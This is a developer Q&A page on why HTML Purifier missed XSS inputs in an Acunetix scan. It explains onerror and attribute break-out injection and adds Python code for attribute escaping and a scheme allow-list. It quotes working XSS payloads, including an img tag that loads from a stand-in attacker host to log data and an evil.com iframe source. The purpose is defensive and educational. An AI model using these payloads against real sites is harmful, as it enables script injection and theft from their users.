且构网 - Sharing the things programmers run into in development

XSS vulnerabilities remain even after using HTML Purifier

Updated: 2023-01-23 21:07:35



I'm testing one of my web applications using Acunetix. To protect this project against XSS attacks, I used HTML Purifier. This library is recommended by most PHP developers for this purpose, but my scan results show HTML Purifier cannot protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs:

1. 1<img sRc='http://attacker-9437/log.php? (See HTML Purifier result here)
2. 1"onmouseover=vVF3(9185)" (See HTML Purifier result here)

As you can see from the results, HTML Purifier could not detect such attacks. I don't know if there is any specific option in HTML Purifier to solve such problems, or whether it is really unable to detect these methods of XSS attack.
Do you have any idea? Or any other solution?

All the HTML purifier seems to be doing, from the brief look that I gave, was HTML encode certain characters such as <, > and so on. However there are other means of invoking JS without using the normal HTML characters:

    javascript:prompt(1)  // In image tags
    src="http://evil.com/xss.html"  // In iFrame tags

Please review comments (by @pinkgothic) below.

Points below:

1. This would be HTML injection which does effectively lead to XSS. In this case, you open an <img> tag, point the src to some non-existent file which in turn raises an error. That can then be handled by the onerror handler to run some JavaScript code. Take the following example:

    <img src=x onerror=alert(document.domain)>

The entry point for this is generally accompanied by prematurely closing another tag on an input. For example (URL decoded for clarity):

    GET /products.php?type="><img src=x onerror=prompt(1)> HTTP/1.1

This, however, is easily mitigated by HTML escaping meta-characters (i.e. <, >).

2. Same as above, except this could be closing off an HTML attribute instead of a tag and inserting its own attribute. Say you have a page where you can upload the URL for an image:

    <img src="$USER_DEFINED">

A normal example would be:

    <img src="http://example.com/img.jpg">

However, inserting the above payload, we cut off the src attribute which points to a non-existent file and inject an onerror handler:

    <img src="1"onerror=alert(document.domain)">

This executes the same payload mentioned above.

Remediation

This is heavily documented and tested in multiple places, so I won't go into detail. However, the following two articles are great on the subject and will cover all your needs:

1. https://www.acunetix.com/websitesecurity/cross-site-scripting/
2. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
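The attribute break-out and the javascript: URL discussed in the answer, pushed through the `<img src="$USER_DEFINED">` template with and without the attribute-context escaping the answer recommends. This is an added Python example (the question is about PHP, but the escaping rule is the same), not code from the question, the answer or HTML Purifier; the `render_*` helpers, `img_attributes`, the sample dict and the `about:blank` fallback are my own, and Python's HTMLParser stands in for what a browser tokenizer would see.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The answer's template: user input lands inside a double-quoted src attribute.
TEMPLATE = '<img src="{}">'

# Constructed inputs: the payloads quoted on the page plus a benign URL.
SAMPLES = {
    "benign": "http://example.com/img.jpg",
    "attr_breakout": '1"onerror=alert(document.domain)',
    "mouseover": '1"onmouseover=vVF3(9185)"',
    "js_scheme": "javascript:prompt(1)",
}

def render_unsafe(url: str) -> str:
    """Vulnerable: raw input interpolated into the attribute, as on the page."""
    return TEMPLATE.format(url)

def render_escaped(url: str) -> str:
    """Attribute-context escaping: quote=True also encodes " and ', so the
    input can no longer terminate src and start its own onerror=... attribute."""
    return TEMPLATE.format(html.escape(url, quote=True))

def render_safe(url: str) -> str:
    """Escaping plus a scheme allow-list, which is what stops javascript: URLs.
    The about:blank fallback is my own choice, not something the page gives."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        url = "about:blank"
    return render_escaped(url)

class _ImgAttrs(HTMLParser):
    """Collects <img> attributes, roughly as a browser tokenizer would see them."""
    def __init__(self):
        super().__init__()
        self.attrs = {}
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs.update(attrs)

def img_attributes(markup: str) -> dict:
    parser = _ImgAttrs()
    parser.feed(markup)
    return parser.attrs

def has_event_handler(markup: str) -> bool:
    """True if any on* attribute (onerror, onmouseover, ...) survived rendering."""
    return any(name.startswith("on") for name in img_attributes(markup))
```

With the unsafe template both scanner payloads come back as a separate on* attribute; with attribute escaping they stay inside the src value, and the scheme check is what catches the javascript: case, which escaping alone leaves untouched.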